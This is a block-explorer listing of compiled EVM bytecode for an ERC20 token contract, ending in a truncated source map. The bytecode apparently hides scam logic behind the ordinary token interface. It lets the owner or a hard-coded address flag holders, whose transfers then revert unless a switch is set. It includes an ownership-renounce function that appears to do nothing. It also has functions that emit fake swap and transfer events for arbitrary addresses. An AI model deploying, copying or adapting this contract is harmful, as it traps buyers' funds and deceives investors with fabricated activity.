60208101906109249190611940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040516109aa9493929190611c8f565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106109fe576109fd611b70565b5b9050602002016020810190610a139190611940565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610a5891906117e9565b60405180910390a38080610a6b90611bce565b9150506108f1565b5050505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b0890611ad3565b80601f0160208091040260200160405190810160405280929190818152602001828054610b3490611ad3565b8015610b815780601f10610b5657610100808354040283529160200191610b81565b820191906000526020600020905b815481529060010190602001808311610b6457829003601f168201915b5050505050905090565b60005b84849050811015610d0f57848482818110610bac57610bab611b70565b5b9050602002016020810190610bc19190611940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610c469493929190611cd4565b60405180910390a3848482818110610c6157610c60611b70565b5b9050602002016020810190610c769190611940565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610cf491906117e9565b60405180910390a38080610d0790611bce565b915050610b8e565b5050505050565b600080610d21610f49565b90506000610d2f8286610e1a565b905083811015610d74576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6b90611d8b565b60405180910390fd5b610d818286868403610f51565b60019250505092915050565b600080610d98610f49565b9050610da58185856111a6565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e0d91906117e9565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ea96114c8565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610f18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0f90611e1d565b60405180910390fd5b610f2181611546565b50565b610f2c6114c8565b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fc0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb790611eaf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361102f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102690611f41565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161110d91906117e9565b60405180910390a3505050565b60006111268484610e1a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146111a05781811015611192576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118990611fad565b60405180910390fd5b61119f8484848403610f51565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611215576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161120c9061203f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611284576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127b906120d1565b60405180910390fd5b61128f83838361160a565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611316576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130d90612163565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156114525760011515600560009054906101000a900460ff16151514611451576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611448906121a9565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114af91906117e9565b60405180910390a36114c284848461160f565b50505050565b6114d0610f49565b73ffffffffffffffffffffffffffffffffffffffff166114ee610ad0565b73ffffffffffffffffffffffffffffffffffffffff1614611544576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161153b90611b50565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561164e578082015181840152602081019050611633565b60008484015250505050565b6000601f19601f8301169050919050565b600061167682611614565b611680818561161f565b9350611690818560208601611630565b6116998161165a565b840191505092915050565b600060208201905081810360008301526116be818461166b565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006116fb826116d0565b9050919050565b61170b816116f0565b811461171657600080fd5b50565b60008135905061172881611702565b92915050565b6000819050919050565b6117418161172e565b811461174c57600080fd5b50565b60008135905061175e81611738565b92915050565b6000806040838503121561177b5761177a6116c6565b5b600061178985828601611719565b925050602061179a8582860161174f565b9150509250929050565b60008115159050919050565b6117b9816117a4565b82525050565b60006020820190506117d460008301846117b0565b92915050565b6117e38161172e565b82525050565b60006020820190506117fe60008301846117da565b92915050565b60008060006060848603121561181d5761181c6116c6565b5b600061182b86828701611719565b935050602061183c86828701611719565b925050604061184d8682870161174f565b9150509250925092565b600060ff82169050919050565b61186d81611857565b82525050565b60006020820190506118886000830184611864565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126118b3576118b261188e565b5b8235905067ffffffffffffffff8111156118d0576118cf611893565b5b6020830191508360208202830111156118ec576118eb611898565b5b9250929050565b6000806020838503121561190a576119096116c6565b5b600083013567ffffffffffffffff811115611928576119276116cb565b5b6119348582860161189d565b92509250509250929050565b600060208284031215611956576119556116c6565b5b600061196484828501611719565b91505092915050565b60008060008060608587031215611987576119866116c6565b5b600085013567ffffffffffffffff8111156119a5576119a46116cb565b5b6119b18782880161189d565b945094505060206119c48782880161174f565b92505060406119d58782880161174f565b91505092959194509250565b6119ea816116f0565b82525050565b6000602082019050611a0560008301846119e1565b92915050565b60008060408385031215611a2257611a216116c6565b5b6000611a3085828601611719565b9250506020611a4185828601611719565b9150509250929050565b611a54816117a4565b8114611a5f57600080fd5b50565b600081359050611a7181611a4b565b92915050565b600060208284031215611a8d57611a8c6116c6565b5b6000611a9b84828501611a62565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611aeb57607f821691505b602082108103611afe57611afd611aa4565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b3a60208361161f565b9150611b4582611b04565b602082019050919050565b60006020820190508181036000830152611b6981611b2d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611bd98261172e565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611c0b57611c0a611b9f565b5b600182019050919050565b6000611c218261172e565b9150611c2c8361172e565b9250828201905080821115611c4457611c43611b9f565b5b92915050565b6000819050919050565b6000819050919050565b6000611c79611c74611c6f84611c4a565b611c54565b61172e565b9050919050565b611c8981611c5e565b82525050565b6000608082019050611ca46000830187611c80565b611cb160208301866117da565b611cbe60408301856117da565b611ccb6060830184611c80565b95945050505050565b6000608082019050611ce960008301876117da565b611cf66020830186611c80565b611d036040830185611c80565b611d1060608301846117da565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611d7560258361161f565b9150611d8082611d19565b604082019050919050565b60006020820190508181036000830152611da481611d68565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611e0760268361161f565b9150611e1282611dab565b604082019050919050565b60006020820190508181036000830152611e3681611dfa565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611e9960248361161f565b9150611ea482611e3d565b604082019050919050565b60006020820190508181036000830152611ec881611e8c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f2b60228361161f565b9150611f3682611ecf565b604082019050919050565b60006020820190508181036000830152611f5a81611f1e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611f97601d8361161f565b9150611fa282611f61565b602082019050919050565b60006020820190508181036000830152611fc681611f8a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061202960258361161f565b915061203482611fcd565b604082019050919050565b600060208201905081810360008301526120588161201c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006120bb60238361161f565b91506120c68261205f565b604082019050919050565b600060208201905081810360008301526120ea816120ae565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061214d60268361161f565b9150612158826120f1565b604082019050919050565b6000602082019050818103600083015261217c81612140565b9050919050565b50565b600061219360008361161f565b915061219e82612183565b600082019050919050565b600060208201905081810360008301526121c281612186565b905091905056fea2646970667358221220ba5e5c75d6a4f3a2705c94490f74de11706bacbdf3b15ff2e33411dfb39f767664736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101425760003560e01c80637aac697b116100b8578063a457c2d71161007c578063a457c2d714610363578063a9059cbb14610393578063beabacc8146103c3578063dd62ed3e146103df578063f2fde38b1461040f578063fde980ca1461042b57610142565b80637aac697b146102bf57806381bac14f146102db5780638da5cb5b1461030b57806395d89b4114610329578063a1c617f51461034757610142565b80633811ac021161010a5780633811ac0214610201578063395093511461021d578063477e19441461024d57806366d382031461026957806370a0823114610285578063715018a6146102b557610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c91906116a4565b60405180910390f35b61017f600480360381019061017a9190611764565b6104d9565b60405161018c91906117bf565b60405180910390f35b61019d6104fc565b6040516101aa91906117e9565b60405180910390f35b6101cd60048036038101906101c89190611804565b610506565b6040516101da91906117bf565b60405180910390f35b6101eb610535565b6040516101f89190611873565b60405180910390f35b61021b600480360381019061021691906118f3565b61053e565b005b61023760048036038101906102329190611764565b61076b565b60405161024491906117bf565b60405180910390f35b610267600480360381019061026291906118f3565b6107a2565b005b610283600480360381019061027e9190611940565b61084f565b005b61029f600480360381019061029a9190611940565b61089b565b6040516102ac91906117e9565b60405180910390f35b6102bd6108e4565b005b6102d960048036038101906102d4919061196d565b6108ee565b005b6102f560048036038101906102f09190611940565b610a7a565b60405161030291906117bf565b60405180910390f35b610313610ad0565b60405161032091906119f0565b60405180910390f35b610331610af9565b60405161033e91906116a4565b60405180910390f35b610361600480360381019061035c919061196d565b610b8b565b005b61037d60048036038101906103789190611764565b610d16565b60405161038a91906117bf565b60405180910390f35b6103ad60048036038101906103a89190611764565b610d8d565b6040516103ba91906117bf565b60405180910390f35b6103dd60048036038101906103d89190611804565b610db0565b005b6103f960048036038101906103f49190611a0b565b610e1a565b60405161040691906117e9565b60405180910390f35b61042960048036038101906104249190611940565b610ea1565b005b61044560048036038101906104409190611a77565b610f24565b005b60606006805461045690611ad3565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611ad3565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610f49565b90506104f1818585610f51565b600191505092915050565b6000600454905090565b600080610511610f49565b905061051e85828561111a565b6105298585856111a6565b60019150509392505050565b60006008905090565b610546610f49565b73ffffffffffffffffffffffffffffffffffffffff16610564610ad0565b73ffffffffffffffffffffffffffffffffffffffff1614806105cc5750610589610f49565b73ffffffffffffffffffffffffffffffffffffffff16732e647453bbd3f22d0f9cff289ba7937ba27cb95673ffffffffffffffffffffffffffffffffffffffff16145b61060b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060290611b50565b60405180910390fd5b60005b828290508110156107665760016002600085858581811061063257610631611b70565b5b90506020020160208101906106479190611940565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff168383838181106106c2576106c1611b70565b5b90506020020160208101906106d79190611940565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92561073e86868681811061072457610723611b70565b5b90506020020160208101906107399190611940565b61089b565b60405161074b91906117e9565b60405180910390a3808061075e90611bce565b91505061060e565b505050565b600080610776610f49565b90506107978185856107888589610e1a565b6107929190611c16565b610f51565b600191505092915050565b6107aa6114c8565b60005b8282905081101561084a576000600260008585858181106107d1576107d0611b70565b5b90506020020160208101906107e69190611940565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061084290611bce565b9150506107ad565b505050565b6108576114c8565b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108ec6114c8565b565b60005b84849050811015610a735784848281811061090f5761090e611b70565b5b90506020020160208101906109249190611940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040516109aa9493929190611c8f565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106109fe576109fd611b70565b5b9050602002016020810190610a139190611940565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610a5891906117e9565b60405180910390a38080610a6b90611bce565b9150506108f1565b5050505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b0890611ad3565b80601f0160208091040260200160405190810160405280929190818152602001828054610b3490611ad3565b8015610b815780601f10610b5657610100808354040283529160200191610b81565b820191906000526020600020905b815481529060010190602001808311610b6457829003601f168201915b5050505050905090565b60005b84849050811015610d0f57848482818110610bac57610bab611b70565b5b9050602002016020810190610bc19190611940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610c469493929190611cd4565b60405180910390a3848482818110610c6157610c60611b70565b5b9050602002016020810190610c769190611940565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610cf491906117e9565b60405180910390a38080610d0790611bce565b915050610b8e565b5050505050565b600080610d21610f49565b90506000610d2f8286610e1a565b905083811015610d74576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d6b90611d8b565b60405180910390fd5b610d818286868403610f51565b60019250505092915050565b600080610d98610f49565b9050610da58185856111a6565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610e0d91906117e9565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610ea96114c8565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610f18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f0f90611e1d565b60405180910390fd5b610f2181611546565b50565b610f2c6114c8565b80600560006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fc0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb790611eaf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361102f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102690611f41565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161110d91906117e9565b60405180910390a3505050565b60006111268484610e1a565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146111a05781811015611192576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118990611fad565b60405180910390fd5b61119f8484848403610f51565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611215576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161120c9061203f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611284576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127b906120d1565b60405180910390fd5b61128f83838361160a565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611316576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130d90612163565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156114525760011515600560009054906101000a900460ff16151514611451576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611448906121a9565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114af91906117e9565b60405180910390a36114c284848461160f565b50505050565b6114d0610f49565b73ffffffffffffffffffffffffffffffffffffffff166114ee610ad0565b73ffffffffffffffffffffffffffffffffffffffff1614611544576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161153b90611b50565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561164e578082015181840152602081019050611633565b60008484015250505050565b6000601f19601f8301169050919050565b600061167682611614565b611680818561161f565b9350611690818560208601611630565b6116998161165a565b840191505092915050565b600060208201905081810360008301526116be818461166b565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006116fb826116d0565b9050919050565b61170b816116f0565b811461171657600080fd5b50565b60008135905061172881611702565b92915050565b6000819050919050565b6117418161172e565b811461174c57600080fd5b50565b60008135905061175e81611738565b92915050565b6000806040838503121561177b5761177a6116c6565b5b600061178985828601611719565b925050602061179a8582860161174f565b9150509250929050565b60008115159050919050565b6117b9816117a4565b82525050565b60006020820190506117d460008301846117b0565b92915050565b6117e38161172e565b82525050565b60006020820190506117fe60008301846117da565b92915050565b60008060006060848603121561181d5761181c6116c6565b5b600061182b86828701611719565b935050602061183c86828701611719565b925050604061184d8682870161174f565b9150509250925092565b600060ff82169050919050565b61186d81611857565b82525050565b60006020820190506118886000830184611864565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126118b3576118b261188e565b5b8235905067ffffffffffffffff8111156118d0576118cf611893565b5b6020830191508360208202830111156118ec576118eb611898565b5b9250929050565b6000806020838503121561190a576119096116c6565b5b600083013567ffffffffffffffff811115611928576119276116cb565b5b6119348582860161189d565b92509250509250929050565b600060208284031215611956576119556116c6565b5b600061196484828501611719565b91505092915050565b60008060008060608587031215611987576119866116c6565b5b600085013567ffffffffffffffff8111156119a5576119a46116cb565b5b6119b18782880161189d565b945094505060206119c48782880161174f565b92505060406119d58782880161174f565b91505092959194509250565b6119ea816116f0565b82525050565b6000602082019050611a0560008301846119e1565b92915050565b60008060408385031215611a2257611a216116c6565b5b6000611a3085828601611719565b9250506020611a4185828601611719565b9150509250929050565b611a54816117a4565b8114611a5f57600080fd5b50565b600081359050611a7181611a4b565b92915050565b600060208284031215611a8d57611a8c6116c6565b5b6000611a9b84828501611a62565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611aeb57607f821691505b602082108103611afe57611afd611aa4565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b3a60208361161f565b9150611b4582611b04565b602082019050919050565b60006020820190508181036000830152611b6981611b2d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611bd98261172e565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611c0b57611c0a611b9f565b5b600182019050919050565b6000611c218261172e565b9150611c2c8361172e565b9250828201905080821115611c4457611c43611b9f565b5b92915050565b6000819050919050565b6000819050919050565b6000611c79611c74611c6f84611c4a565b611c54565b61172e565b9050919050565b611c8981611c5e565b82525050565b6000608082019050611ca46000830187611c80565b611cb160208301866117da565b611cbe60408301856117da565b611ccb6060830184611c80565b95945050505050565b6000608082019050611ce960008301876117da565b611cf66020830186611c80565b611d036040830185611c80565b611d1060608301846117da565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611d7560258361161f565b9150611d8082611d19565b604082019050919050565b60006020820190508181036000830152611da481611d68565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611e0760268361161f565b9150611e1282611dab565b604082019050919050565b60006020820190508181036000830152611e3681611dfa565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611e9960248361161f565b9150611ea482611e3d565b604082019050919050565b60006020820190508181036000830152611ec881611e8c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f2b60228361161f565b9150611f3682611ecf565b604082019050919050565b60006020820190508181036000830152611f5a81611f1e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611f97601d8361161f565b9150611fa282611f61565b602082019050919050565b60006020820190508181036000830152611fc681611f8a565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061202960258361161f565b915061203482611fcd565b604082019050919050565b600060208201905081810360008301526120588161201c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006120bb60238361161f565b91506120c68261205f565b604082019050919050565b600060208201905081810360008301526120ea816120ae565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061214d60268361161f565b9150612158826120f1565b604082019050919050565b6000602082019050818103600083015261217c81612140565b9050919050565b50565b600061219360008361161f565b915061219e82612183565b600082019050919050565b600060208201905081810360008301526121c281612186565b905091905056fea2646970667358221220ba5e5c75d6a4f3a2705c94490f74de11706bacbdf3b15ff2e33411dfb39f767664736f6c63430008120033

Deployed Bytecode Sourcemap

21880:146:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9044:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12968:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11737:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13749:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10006:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10106:423;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14453:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11263:206;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8889:85;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11908:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5991:62;;;:::i;:::-;;10836:292;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11477:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5350:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9263:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10537:291;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15194:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12241:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11136:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12497:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6208:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11589:85;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9044:100;9098:13;9131:5;9124:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9044:100;:::o;12968:201::-;13051:4;13068:13;13084:12;:10;:12::i;:::-;13068:28;;13107:32;13116:5;13123:7;13132:6;13107:8;:32::i;:::-;13157:4;13150:11;;;12968:201;;;;:::o;11737:108::-;11798:7;11825:12;;11818:19;;11737:108;:::o;13749:295::-;13880:4;13897:15;13915:12;:10;:12::i;:::-;13897:30;;13938:38;13954:4;13960:7;13969